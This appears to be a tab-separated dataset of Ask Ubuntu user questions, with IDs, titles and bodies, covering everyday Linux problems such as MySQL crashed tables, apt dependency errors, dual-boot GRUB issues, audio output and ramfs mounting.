523233	shows : ::18332 instead of 0.0.0.0:8332 , what means that ?	what means : : : in front of a port ( where usually the ip should be ) when doing netstat ? it shows : ::18332 instead of 0.0.0.0:18332 and i ca n't connect to that port from the outside . this is for bitcoin-qt and i 'm using this conf file rpcuser=edited rpcpassword=edited rpcallowip=192.168.0.4 # this is the miner ip which is in the lan and is accessible from my pc just fine # gen=1 # tested with both that commented out and not , not sure if it 's needed server=1 testnet=1 i 'm starting it like that in the terminal ./bitcoin-qt
523234	database error . wordpress . mysql have shut down at 10:00 am	could you please tell me what 's wrong with my mysql ? ubuntu 14.04 . i ca n't understand what 's going on.. 140912 10:00:55 [ warning ] using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release . please use the full name instead . 140912 10:00:55 [ note ] plugin 'federated ' is disabled . 140912 10:00:55 innodb : the innodb memory heap is disabled 140912 10:00:55 innodb : mutexes and rw_locks use gcc atomic builtins 140912 10:00:55 innodb : compressed tables use zlib 1.2.8 140912 10:00:55 innodb : using linux native aio 140912 10:00:55 innodb : initializing buffer pool , size = 128.0m 140912 10:00:55 innodb : completed initialization of buffer pool 140912 10:00:55 innodb : highest supported file format is barracuda . innodb : the log sequence number in ibdata files does not match innodb : the log sequence number in the ib_logfiles ! 140912 10:00:55 innodb : database was not shut down normally ! innodb : starting crash recovery . innodb : reading tablespace information from the .ibd files ... innodb : restoring possible half-written data pages from the doublewrite innodb : buffer ... 140912 10:00:55 innodb : waiting for the background threads to start 140912 10:00:56 innodb : 5.5.37 started ; log sequence number 4099203 140912 10:00:56 [ note ] server hostname ( bind-address ) : '127.0.0.1 ' ; port : 3306 140912 10:00:56 [ note ] - '127.0.0.1 ' resolves to '127.0.0.1 ' ; 140912 10:00:56 [ note ] server socket created on ip : '127.0.0.1 ' . 140912 10:00:56 [ note ] event scheduler : loaded 0 events 140912 10:00:56 [ note ] /usr/sbin/mysqld : ready for connections . version : '5.5.37-0ubuntu0.14.04.1 ' socket : '/var/run/mysqld/mysqld.sock ' port : 3306 ( ubuntu ) 140912 10:00:57 [ error ] /usr/sbin/mysqld : table './feba/flbnglcommentmeta ' is marked as crashed and should be repaired 140912 10:00:57 [ warning ] checking table : './feba/flbnglcommentmeta' 140912 10:00:57 [ error ] /usr/sbin/mysqld : table './feba/flbnglcomments ' is marked as crashed and should be repaired 140912 10:00:57 [ warning ] checking table : './feba/flbnglcomments' 140912 10:00:57 [ error ] /usr/sbin/mysqld : table './feba/flbngloptions ' is marked as crashed and should be repaired 140912 10:00:57 [ warning ] checking table : './feba/flbngloptions' 140912 10:00:57 [ error ] /usr/sbin/mysqld : table './feba/flbnglpostmeta ' is marked as crashed and should be repaired 140912 10:00:57 [ warning ] checking table : './feba/flbnglpostmeta' 140912 10:00:58 [ error ] /usr/sbin/mysqld : table './feba/flbnglposts ' is marked as crashed and should be repaired 140912 10:00:58 [ warning ] checking table : './feba/flbnglposts' 140912 10:00:58 [ error ] /usr/sbin/mysqld : table './feba/flbnglterm_relationships ' is marked as crashed and should be repaired 140912 10:00:58 [ warning ] checking table : './feba/flbnglterm_relationships' 140912 10:00:58 [ error ] /usr/sbin/mysqld : table './feba/flbnglterm_taxonomy ' is marked as crashed and should be repaired 140912 10:00:58 [ warning ] checking table : './feba/flbnglterm_taxonomy' 140912 10:00:58 [ error ] /usr/sbin/mysqld : table './feba/flbnglusermeta ' is marked as crashed and should be repaired 140912 10:00:58 [ warning ] checking table : './feba/flbnglusermeta' 140912 10:00:58 [ error ] /usr/sbin/mysqld : table './feba/flbnglusers ' is marked as crashed and should be repaired 140912 10:00:58 [ warning ] checking table : './feba/flbnglusers' 140912 10:00:58 [ error ] /usr/sbin/mysqld : table './feba/flbnglwoocommerce_order_itemmeta ' is marked as crashed and should be repaired 140912 10:00:58 [ warning ] checking table : './feba/flbnglwoocommerce_order_itemmeta' 140912 10:00:58 [ error ] /usr/sbin/mysqld : table './feba/flbnglwoocommerce_order_items ' is marked as crashed and should be repaired 140912 10:00:58 [ warning ] checking table : './feba/flbnglwoocommerce_order_items' 140912 10:00:58 [ error ] /usr/sbin/mysqld : table './feba/flbnglyith_wcwl ' is marked as crashed and should be repaired 140912 10:00:58 [ warning ] checking table : './feba/flbnglyith_wcwl' 140912 10:00:58 [ error ] /usr/sbin/mysqld : table './phpmyadmin/pma_recent ' is marked as crashed and should be repaired 140912 10:00:58 [ warning ] checking table : './phpmyadmin/pma_recent' 140912 10:02:48 [ note ] /usr/sbin/mysqld : normal shutdown 140912 10:02:48 [ note ] event scheduler : purging the queue . 0 events 140912 10:02:49 innodb : starting shutdown ... 140912 10:02:49 innodb : shutdown completed ; log sequence number 4101802 140912 10:02:49 [ note ] /usr/sbin/mysqld : shutdown complete 140912 10:03:14 [ warning ] using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release . please use the full name instead . 140912 10:03:14 [ note ] plugin 'federated ' is disabled . 140912 10:03:14 innodb : the innodb memory heap is disabled 140912 10:03:14 innodb : mutexes and rw_locks use gcc atomic builtins 140912 10:03:14 innodb : compressed tables use zlib 1.2.8 140912 10:03:14 innodb : using linux native aio 140912 10:03:14 innodb : initializing buffer pool , size = 128.0m 140912 10:03:14 innodb : completed initialization of buffer pool 140912 10:03:14 innodb : highest supported file format is barracuda . 140912 10:03:14 innodb : waiting for the background threads to start 140912 10:03:15 innodb : 5.5.37 started ; log sequence number 4101802 140912 10:03:15 [ note ] server hostname ( bind-address ) : '127.0.0.1 ' ; port : 3306 140912 10:03:15 [ note ] - '127.0.0.1 ' resolves to '127.0.0.1 ' ; 140912 10:03:15 [ note ] server socket created on ip : '127.0.0.1 ' . 140912 10:03:15 [ note ] event scheduler : loaded 0 events 140912 10:03:15 [ note ] /usr/sbin/mysqld : ready for connections . version : '5.5.37-0ubuntu0.14.04.1 ' socket : '/var/run/mysqld/mysqld.sock ' port : 3306 ( ubuntu ) thank you !
523242	ubuntu server 14.04 : configuring configserver security & firewall for mediatomb	i am currently have issues with getting mediatomb to work with csf on my home network server . i have been able to get the mediatomb server to work with csf turned off . my mediatomb web gui is set to the default port of 49152 . i have configured the csf firewall to allow ports 1900 and 49152 for both tcp and udp . this allowed the web gui to work , but the mediatomb server still can not get past the firewall . could this be something with igmp protocol ? i have tried to find a section of the csf config file that deals with igmp , but i could not find anything .
523245	weird wireless networking problems	i 'm running xubuntu-desktop on my samsung chromebook arm7 and it works on the wifi network where i installed the os but it wont work on other networks tho i can assess the routers page i have tried setting static dns server but that did n't seem to do anything
523246	why does n't live usb work in non-uefi mode ?	i have windows 7 64 bit installed on one partition ( the rest of the disk is unallocated ) . i made a live usb with the latest official kubuntu 14.04 64 bit iso . when i boot , there are two usb options : with uefi or without . i have windows 7 in `` legacy bios mode '' so i choose the one without uefi . when i boot into this one , i briefly see a splash screen ( similar to this , but a black background ) , then the screen goes blank and enters sleep mode after a few seconds . why does this happen and what can i do ? note : i have also tried booting into the `` uefi : sandisk cruzer '' option to see if it works . installation starts normally ( the monitor does n't sleep etc . ) but it does n't recognize that windows 7 is there , it thinks the entire disk is free space . thank you in advance . edit : after some more messing around and bsods , i got my computer to work as i wanted ( though i never found an exact answer to the original question ) . in case it helps anyone : i followed this guide religiously . part of it is to correctly put windows 7 64 bit on a usb , where it links to another guide . i had trouble with it from another computer that has xp ( the gpt option did n't appear ) , so i ended up installing windows 7 non-uefi , in order to make a uefi windows 7 usb in the first place . it was messy , but it worked . then i installed kubuntu with uefi , it recognized everything well , and manual partitioning automatically chose the mount point of the efi partition which was created by windows .
523248	apt-get unmet dependencies	iâ´m using ubuntu server 12.04 and mysql 5.5 . when i try to install libsml2-dev i get the following message : root @ myserver : /usr/local/php5516/php-5.5.16 # apt-get install libxml2-dev reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : mysql-server : depends : mysql-community-server ( = 5.6.20-1ubuntu12.04 ) but it is not installable e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . when i followed the instructions , i got this : root @ myserver : /usr/local/php5516/php-5.5.16 # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages will be removed : libpam-plesk mysql-server plesk-base plesk-billing plesk-core plesk-l10n plesk-mail-qc-driver plesk-management-node plesk-service-node-utilities pp-sitebuilder pp11.0.9-bootstrapper pp11.5.30-bootstrapper psa-atmail psa-awstats-configurator psa-drweb- configurator psa-firewall psa-horde psa-imp psa-ingo psa-kronolith psa-libxml-proxy psa-logrotate psa-mailman-configurator psa-migration-agents psa-migration-manager psa-mimp psa-mnemo psa-passwd psa-php5-configurator psa-phpmyadmin psa-phppgadmin psa-pylibplesk psa-qmail psa-qmail-rblsmtpd psa-spamassassin psa-turba psa-updates psa-vpn psa-watchdog 0 upgraded , 0 newly installed , 39 to remove and 42 not upgraded . 1 not fully installed or removed . after this operation , 714 mb disk space will be freed . do you want to continue [ y/n ] ? but i can not remove this packages because iâ´m using plesk to manage my server and mysql 5.5 . how can i solve this problem with apt , so i could install new packages ?
523249	cpu temparature above threshold	my pc is running ubuntu 14.04 currently . for last two days , the pc does not turn on . on running recovery mode , the message `` cpu temperature above threshold '' shows . sometimes the pc do start , only to shut itself off showing a scrolling message `` thermal shutdown '' . please help
523250	how do i revoke a pgp key on a server ?	here 's the situation , i have a pgp key i generated a long time ago and i have lost my private key . however i have a revocation certificate on my usb drive and i would like to revoke the key . after looking on the internet i found this solution $ gpg -- import /path/to/usb/revocert-01324567.asc gpg : key 01324567 : no public key - ca n't apply revocation certificate gpg : total number processed : 1 i 'm unsure how to download my public key from the keyserver , and how to upload it . help would be appreciated .
523251	run a program x times	how do i execute a program x times in the terminal ? i read that i have to do a bin/bash txt , but i do n't know how to execute this x times .
523253	windows 7 and kubuntu 14.10 beta 1 clock not right - again	i know this question have been answered before but the fix is n't working anymore . the usual fix on ubuntu/kubuntu is edit the /etc/default/rcs file and be sure to have utc=no then save and reboot the problem is in kubuntu 14.10 it 's already set to utc=no and having the line commented ( with # before utc=no ) is n't working either . i do n't know if it 's relevant but i had that problem with windowsxp/kubuntu 12.04 too and the usual fix worked that 's why i 'm clueless about how to fix this on my windows7/kubuntu 14.10 installation . i 'm aware of the fact that kubuntu 14.10 is a beta and might have some bugs but the beta itself is working great and the clock differential in windows 7 is the only problem i have with my dual boot and since the usual fix do n't work i 'm looking for another way to fix it .
523254	pxe based insallation always sets hostname as 'kickseed '	i am using pxe based provisioning of ubuntu 12.04.5 . i have pxe , tftp , dhcp server in place . all my configurations specified in kickstart file are set correctly except the hostname . the machine always gets hostname as 'kickseed ' . following is the entry in my kickstart file : network -- bootproto dhcp -- device eth0 -- hostname myhost i found following related issue which has been fixed in ubuntu 12.04.4 : https : //bugs.launchpad.net/ubuntu/+source/kickseed/+bug/879605 however this one was for static whereas i face issue during dhcp . any idea how i could resolve this issue or any pointers where i can look into ?
523259	how to run .sh through terminal without using nautilus ubuntu 14.04	i have an .sh file that looks like # ! bin/bash exec /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/ java java -jar /home/me/myfolder/my.jar i 've made this file executable and it works fine when in the `` nautilus '' desktop , but when i run it on just normal desktop ( ubuntu 14.04 ) it only opens with gedit . i have also tried opening it with java 7 and java 6 , but it does not give me the option to run in terminal . also when i 'm in the terminal and cd to the folder containing the .jar file and run it that also works fine . what i 'm looking for is a way to just double click my .sh file without having to go to nautilus first . is this possible ? sorry if this is a duplicate , but i cant find the answer i 'm looking for .
523260	how can i remove other varieties of english from my installed languages ?	my language settings says i have a lot of english variants installed : english ( united states ) , english , english ( australia ) , english ( canada ) , etc , etc . but i have no need for these other englishes , only `` english ( united states ) '' . this causes me a lot of trouble , since depending on what program i 'm using , the spell checker will tell me that i 'm spelling things incorrectly because i 'm using american instead of british spelling , and my language preferences in this respect do n't seem to be sticking . also , every time i open my language settings , i 'm warned that `` the langauge support is not installed completely , '' that `` some translations or writing aids available for your chosen languages are not installed yet . '' it lists these as the packages that i need to install : libreoffice-l10n-en-za thunderbird-locale-en-gb mythes-en-au libreoffice-l10n-en-gb libreoffice-help-en-gb hunspell-en-ca yet at no point did i choose new zealand english or canadian english as my chosen languages . why would i need a spellchecker for canadian english ? i do n't get it .
523266	have xfdesktop instead of nautilus on unity session	xfdesktop has cool features , like rotating wallpapers and such . is there a way to have it handling the desptop background instead of nautilus in a normal unity session ? i 've tried closing nautilus and starting xfdesktop : $ nautilus -q $ xfdesktop -r # not sure if -r is important . but that does n't persist through sessions . what 's missing ?
523271	file system associated with /var ?	while reading about linux , i got the following : the /var directory may be put in its own filesystem so that growth of the files can be accommodated and the file sizes do not fatally affect the system . when i tried to find out the file system for /var by $ df - th , i got.. filesystem type size used avail use % mounted on /dev/sda5 ext4 141g 19g 116g 14 % / none tmpfs 4.0k 0 4.0k 0 % /sys/fs/cgroup udev devtmpfs 1.5g 4.0k 1.5g 1 % /dev tmpfs tmpfs 294m 1.2m 293m 1 % /run none tmpfs 5.0m 0 5.0m 0 % /run/lock none tmpfs 1.5g 38m 1.4g 3 % /run/shm none tmpfs 100m 60k 100m 1 % /run/user here i am not getting /var on mounted on attribute , so what type of file system is associated with /var exactly ? how do i find it ?
523274	resetting xfce panels to default settings ? xubuntu 12.04 x64	i want to reset the panels to defaul . i have already follow an sugested solution but it did n't work this was the solution i tried : resetting xfce panels to default settings ? and this is the error i got : ( xfce4-indicator-plugin:6165 ) : libindicator-warning ** : indicatorobject class does not have an accessible description . ( xfce4-indicator-plugin:6165 ) : libindicator-warning ** : indicatorobject class does not have an accessible description . ( xfce4-indicator-plugin:6165 ) : gtk-critical ** : ia__gtk_widget_realize : assertion `gtk_widget_anchored ( widget ) || gtk_is_invisible ( widget ) ' failed as i said i am runnig xubuntu 12.04 x64 bits , and the happened when by my own curiosity i open the session on xfce . you know xubuntu has the option to login in a xubuntu session or xfce . after that the next time i logged to my account ( xubuntu mode ) all the interface was mis-configured . i already restore some launchers but the behaviour in terminal , windows and panels are not the same . of course it works , but it 's uncomfortable . so any suggestion..
523275	install ubuntu on a ssd alongside windows on a hdd	currently on my notebook i have windows and ubuntu in dual boot on the same hdd , with the following partitions : hdd : windows os ( very rarely used ) ubuntu root partition ( / ) swap ubuntu home partition ( /home ) now , i want to buy a ssd but , since i use windows very rarely and ssd space is not so cheap , i would like to install only ubuntu on the ssd , keeping a dual boot with windows on the hdd . the scheme i would like to achieve is the follwing : ssd : ubuntu root partition ubuntu home partition ( swap ? i read that is not really necessary to put swap on hdd ) hdd : windows os ubuntu data partition ( swap ? ) my idea is to connect the ssd , then install ubuntu 14.04 from scratch on the ssd with this partition scheme , keeping windows on the ssd . then , after installation , i will transfer my old /home data to the ssd , remove the ubuntu os partition on the hdd . it is not clear to me if i have to choose a special setup during the bootloader installation . is it possible ? are there particular recommendations ?
523276	volume buttons control the wrong output device ( xubuntu 14.04 )	in my xubuntu 14.04 sound works fine for all the applications ( the working output device is `` built-in audio analog stereo '' ) , but the volume up , volume down and mute button do n't have any effects . how can i fix this ?
523280	ramfs not using ram	currently i am trying to improve performance of a server by putting files into a ram disk to improve access time . unfortunally ubuntu seems not to really use the ram , instead it still uses hdd space . i mounted the ramfs filesystem with : sudo mount -t ramfs -o size=2048m ramfs /home/ram_disk/ ( where `` ram_disk '' is a folder in the current directory ) when using df -h the ramfs is not listed , nor is the ram usage increasing when copying a 10 gb large file to the `` ram_disk '' folder . mount gives me following output [ ... ] tmpfs on /home/user/desktop/ram_disk type ramfs ( rw , size=2048m ) [ ... ] so even though i am mounting a ramfs it is beeing mounted as a tmpfs what is using swap .
523281	usb is unmountable , system does n't know how	i wanted to mount windows 8 on usb and it kinda succeded given that moving data `` has completed '' without errors . the next day , i plug usb in and i get following error . right after i put usb in the port . opening it does n't succeed , same error prompts .
523284	ubuntu 14.04 no audio	as the title says , i 'm running ubuntu 14.04 and my sound is not working . alsamixer shows everything is open , sound settings recognizes the card , pulseaudio shows output from chorme as well as analog output from the built in audio , and the speakers themselves have been tested on my laptop . anyone have any guesses before i open up the tower to see if i wired something wrong ? -edit 1- forgot to include a few attempted fixes : already checked the results of sudo gedit /etc/default/speech-dispatcher - it is set to no . i have done a force reload on alsa attempting to delete and reinstall alsa has resulted in losing settings in general , which i managed to restore , but still no sound . -edit 2- well , it did n't work the first time around , but updating my drivers did it for me today . sudo add-apt-repository ppa : ubuntu-audio-dev sudo apt-get update sudo apt-get dist-upgrade found on http : //www.unixmen.com/2012003-howto-resolve-nosound-problem-on-ubuntu/
523285	my shell script does not execute on ubuntu , nor on gnome server	i have a shell script which i made executable . when i click on it , it does not open . what do i need to do ?
523287	install virtualbox-4.3 in ubuntu 12.04	kindly someone help . i am quite new in ubuntu . while installing the package , these error messages appear . dpkg : dependency problems prevent configuration of virtualbox-4.3 : i386 : virtualbox-4.3 : i386 depends on libdevmapper1.02.1 ( > = 2:1.02.20 ) . virtualbox-4.3 : i386 depends on libpython2.7 ( > = 2.7 ) . virtualbox-4.3 : i386 depends on libvpx1 ( > = 1.0.0 ) . virtualbox-4.3 : i386 depends on psmisc . dpkg : error processing virtualbox-4.3 : i386 ( -- install ) : dependency problems - leaving unconfigured processing triggers for ureadahead ... processing triggers for shared-mime-info ... unknown media type in type 'all/all ' unknown media type in type 'all/allfiles ' unknown media type in type 'uri/mms ' unknown media type in type 'uri/mmst ' unknown media type in type 'uri/mmsu ' unknown media type in type 'uri/pnm ' unknown media type in type 'uri/rtspt ' unknown media type in type 'uri/rtspu ' processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... errors were encountered while processing : virtualbox-4.3 : i386
523288	install ubuntu 14.04 server using kernel 3.13.0-24	i am running ibm domino and there is a bug in the current 14.04 release that is not in the release using kernel 3.13.0-24 . where do i find the iso that uses this kernel so that i can upgrade my 13.10 server to 14.04 and not break my domino server ?
523289	ubuntu 14.04 does not take updates	update shows the error : sudo apt-get update [ sudo ] password for ankita : e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
523293	windows wont boot when external hdd not connected , how can i fix this ?	my current system is windows 8.1 pro with media center . i wanted to try ubuntu 14.04 , and therefore i installed ubuntu on an external hdd . ( i followed some steps that i found on the internet ) after i installed ubuntu 14.04 , the grub worked fine for ubuntu , but when i wanted to boot back to my windows 8.1 i would get the grub error : '' gnu grub version 2.02~ beta 2-9 [ minimal bash-like line editing is supported for the first world , tab lists possible command completions . anywhere else tab lists the possible completions of a device/filename ] grub > '' i thought to myself , shit , did i ruin my windows ? i frantically looked up a temporary fix in which i found one called boot repair disk . ( now a quick reminder , ubuntu still works properly in the external hdd and i can still fully access it . ) so i run boot repair disk and i let it do it 's thing , after that , i try to boot windows 8.1 without my external hdd and it will not boot . so i plug my external hdd into the usb and let the grub run , i then select run windows 8.1 in the grub menu and it will run . my question : can i get windows 8.1 to run without the external hdd plugged into the usb ? i believe that the ubuntu grub is using my external hdd to run the grub menu . how can i fix this ? please help ! much appreciation !
523295	duel partition install boot problem	unfortunately i got in over my head with installing ubuntu beside windows 7 as a duel partition . right now i am unable to boot from the hdd . after reading up on the topic here i managed to run bootinfoscript after booting from the usb drive . the good news appears to be that i have not wiped windows off my hd . below i 've copied the text from bootinfoscript . any help would be much appreciated . thank you . ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 112 for . = > no boot loader is installed in the mbr of /dev/sdb . = > syslinux mbr ( 4.04 and higher ) is installed in the mbr of /dev/sdc . sda1 : ______________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd sda2 : ______________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd sda3 : ____________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /windows/system32/winload.exe sdb1 : ______________________________________________________________________ file system : ntfs boot sector type : windows xp : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sdb2 : ______________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sdb5 : ______________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 14.04 lts boot files : /boot/grub/grub.cfg /etc/fstab sdb6 : ______________________________________________________________________ file system : swap boot sector type : - boot sector info : sdc1 : ______________________________________________________________________ file system : vfat boot sector type : syslinux 4.07 2013-07-25 boot sector info : syslinux looks at sector 5797208 of /dev/sdc1 for its second stage . syslinux is installed in the /uui directory . the integrity check of the adv area failed . no errors found in the boot parameter block . operating system : boot files : ============================ drive/partition info : ============================= drive : sda _________________________________________________________________ disk /dev/sda : 1500.3 gb , 1500301910016 bytes 255 heads , 63 sectors/track , 182401 cylinders , total 2930277168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 2,048 33,556,479 33,554,432 27 hidden ntfs ( recovery environment ) /dev/sda2 * 33,556,480 33,761,279 204,800 7 ntfs / exfat / hpfs /dev/sda3 33,761,280 2,930,274,303 2,896,513,024 7 ntfs / exfat / hpfs drive : sdb _________________________________________________________________ disk /dev/sdb : 500.1 gb , 500107861504 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773167 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 63 683,404,359 683,404,297 7 ntfs / exfat / hpfs /dev/sdb2 683,405,310 976,773,164 293,367,855 5 extended /dev/sdb5 683,405,312 960,079,140 276,673,829 83 linux /dev/sdb6 960,079,872 976,773,164 16,693,293 82 linux swap / solaris drive : sdc _________________________________________________________________ disk /dev/sdc : 7876 mb , 7876902912 bytes 256 heads , 39 sectors/track , 1540 cylinders , total 15384576 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdc1 * 32 15,384,575 15,384,544 c w95 fat32 ( lba ) '' blkid '' output : ____________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 8e80209e80208eb1 ntfs pqservice /dev/sda2 5c52217452215454 ntfs system reserved /dev/sda3 c4ca2377ca2364c0 ntfs gateway /dev/sdb1 e88cb3f58cb3bbfe ntfs freeagent goflex drive /dev/sdb5 d2549bc7-a39b-4b0f-bb2d-886711211a0d ext4 /dev/sdb6 cb92b912-3ec3-4f6b-96c6-97fefc76bb3d swap /dev/sdc1 3c7e-234d vfat uui ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sdb1 /media/ubuntu-gnome/freeagent goflex drive fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sdb5 /media/ubuntu-gnome/d2549bc7-a39b-4b0f-bb2d-886711211a0d ext4 ( rw , nosuid , nodev , uhelper=udisks2 ) /dev/sdc1 /cdrom vfat ( ro , noatime , fmask=0022 , dmask=0022 , codepage=437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro )
523303	unity3d warning updating from ubuntu 12 to 14	when i try to update from ubuntu 12 to 14 i get the following warning : running the 'unity ' desktop environment is not fully supported by your graphics hardware . you will maybe end up in a very slow environment after the upgrade . our advice is to keep the lts version for now . for more information see https : //wiki.ubuntu.com/x/bugs/updatemanagerwarningforunity3d do you still want to continue with the upgrade ? when i follow the link for the error explanation it says : your machine does not have 3d support for running the unity desktop environment . i have an nvidia graphics card am using the proprietary driver ( 331-updates ) . what does this specific part of the error message mean , does this indicate there is a problem with my current driver setup , and should i upgrade ubuntu ?
523306	how to deal with a complete freeze on ubuntu 14.04	every few hours my laptop ( hp probook 4535s ) with ubuntu 14.04 installed completely freezes . the screen freezes and after a few seconds the audio turns off as well . the only thing i can do is force shut down with the power button . what are my options and what can i do ?
523308	schedule a large download to resume everyday in a specific time-span of the day ?	i want to schedule a large download to occur at night , between 12am and 5am . everyday at 12am wget should automatically pick up where it left the night before , and at 5am , it should automatically pause the download , so it can resume the following night . how can i script this in ubuntu ? what tools do i need ?
523309	14.04 wo n't fully shut down laptop	okay so i recently did a clean install for ubuntu 14.04 and everything has gone well so far . but i 've been having an issue where after the system shuts down it will still stay powered on . so the ubuntu splash for shutting down is one and the screen is black ( no text or images ) . but the backlight remains on , and the power lights all stay on as well . i have to hold the power button until it shuts off completely . the odd thing is that this does n't happen every time either . it 's very frequent , but it does n't happen 100 % of the time . i 'm running a thinkpad t61p , intel core2 duo cpu t7500 2.20ghz , 2gb ram , quadro fx 570m , 64 bit machine .
523310	how to install ubuntu on dell inspiron 3147 ?	i 've downloaded and tried to run ubuntu 14.04.1 lts on laptop dell inspiron 3147 , but it hangs while starting from usb stick . what is the correct way to install ubuntu on my laptop ?
523311	trouble installing netbeans	i am trying to install netbeans 8.0.1 on my ubuntu 14.04 os and i am following the install instructions via http : //linuxg.net/how-to-install-netbeans-ide-8-0-on-all-the-supported-ubuntu-linux-mint-elementary-os-and-debian-systems/ and i installed the java required package successfully . however when i get to the netbeans install i tried the 'sudo chmod +x jdk-8-nb-8-linux-x64.sh ' command ( without the single quotes ) after the wget command and i keep getting a message that the file can not be accessed because no such file or directory was found . i am pretty new to linux and i 'm stumped as to why its not finding the file . do i need to change permissions on it and how would i do that ?
523312	can not install vlc on ubuntu 14.04	i have tried installing vlc on ubuntu 14.04 but it give me the following problem reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.1.4-0ubuntu14.04.1 ) but it is not going to be installed depends : libsdl-image1.2 ( > = 1.2.10 ) but it is not installable depends : libsdl1.2debian ( > = 1.2.11 ) but it is not installable depends : libtar0 but it is not installable depends : libva-x11-1 ( > 1.3.0~ ) but it is not installable depends : libva1 ( > 1.3.0~ ) but it is not installable depends : libvlccore7 ( > = 2.1.0 ) but it is not going to be installed depends : libxcb-composite0 but it is not installable depends : libxcb-xv0 ( > = 1.2 ) but it is not installable recommends : vlc-plugin-notify ( = 2.1.4-0ubuntu14.04.1 ) but it is not going to be installed recommends : vlc-plugin-pulse ( = 2.1.4-0ubuntu14.04.1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages .
523313	toshiba disc creator freezes when i open the ubuntu sever download	i downloaded ubuntu sever for desktop and it bring up my toshiba disk creator and then it freezes.. any ideas on whats wrong ?
523315	trying to get built in analog sound working	ubuntu 14.04 i am trying to get audio output from my built in line out set as default for all applications . i have an nvidia card that i use for video hdmi display to a monitor . my monitor does have built in speakers . i want to have all audio play through my stereo connected to the computer via the built in speaker jack . system settings audio : i can hear the system start-up sound through the stereo and test speaker `` ft right '' and `` ft left '' when i test analog output- built-in audio . i can hear `` ft left '' and `` ft right '' coming from my monitor when i test the hdmi/displayport 2 gf116 high definition audio controller . however , i get no audio output whatsoever when using applications such as chrome , rhythmbox , etc . i think there should be a simple setting to make the built in card the default for all audio while still using the video card for video , but i 'm banging my head . i could even settle for just using my monitor for sound , but i have n't figured that out either . here is output from aplay -l card 0 : sb [ hda ati sb ] , device 0 : alc887-vd analog [ alc887-vd analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 7 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 8 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 9 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 lor @ ubuntuoffice-nforce6m-a : ~ $ sudo gedit /etc/asound.conf thanks for any ideas .
523316	low battery alarm	i 'm using ubuntu 14.04 on a toshiba satellite l750 . low battery visual alerts work perfectly , but i 'd like those to beep ( or other alert sound ) . is that possible at all ? thanks
523317	ubuntu stuck at `` loading initial ramdisk '' during first boot	my ubuntu 14.04.1 ( 3.13.0-32-generic ) seems to not boot right after a fresh install from a live dvd ( tried it multiple times and also from a bootable usb stick as well ) . boot repair info : http : //paste.ubuntu.com/8328560/ graphics card info : ubuntu @ ubuntu : ~ $ lspci -nnk | grep -ia3 vga 00:01.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] richland [ radeon hd 8650g ] [ 1002:990b ] subsystem : lenovo device [ 17aa:397c ] kernel driver in use : radeon 00:01.1 audio device [ 0403 ] : advanced micro devices , inc. [ amd/ati ] trinity hdmi audio controller [ 1002:9902 ] my laptop is a lenovo g505s . i tried following the information on my computer boots to a black screen , what options do i have to fix it ? , but that did n't help . to be more specific i tried the following recommendations : 1 ) replaced `` quiet splash '' with `` no splash '' 2 ) replaced `` quite splash '' with `` nomodeset '' 3 ) replaced `` quite splash '' with `` radeon.modeset=0 '' . the first two options does n't get to the loading initial ramdisk message ( it is stuck post the loading linux message ) . the last option gets stuck after the loading initial ramdisk message ( the same issue i face without editing the boot command list ) . let me know how to proceed with fixing this problem . btw , i tried installing ubuntu in the uefi mode and that installed and booted with no issues . 